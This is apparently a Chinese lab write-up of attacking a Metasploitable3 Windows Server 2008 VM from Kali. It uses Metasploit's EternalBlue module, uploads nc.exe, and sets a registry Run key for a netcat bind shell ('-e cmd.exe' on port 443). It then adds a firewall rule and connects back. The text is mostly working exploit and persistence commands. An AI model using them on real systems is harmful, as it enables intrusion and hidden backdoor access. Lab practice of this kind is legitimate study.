🎈: 简单的操作却被自己搞的相当复杂,真是菜到家了。
准备工作:
攻击机:kali Linux 2021。 IP:192.168.47.48
靶机: windows Server 2008 (metasploitable3-win2k8) IP:192.168.47.106
一、永恒之蓝
测试指令:
search ms17_010
use 3
set rhosts 192.168.47.106
run
exp选取:
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.47.106
run
攻击
靶机已上号!!!
二、nc植入
upload /usr/share/windows-binaries/nc.exe C:\windows\system32
上传nc.exe
上传成功!!!
修改注册表
指令:
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d ‘C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe’
success!!!
定义防火墙规则
指令:
使用 shell加入win模式
netsh advfirewall firewall add rule name=“test443” protocol=TCP dir=in localport=443 action=allow
配置成功!!!!
重新启动靶机刷新配置(可手动)
三、nc侦听
指令:
nc -v 192.168.47.106 443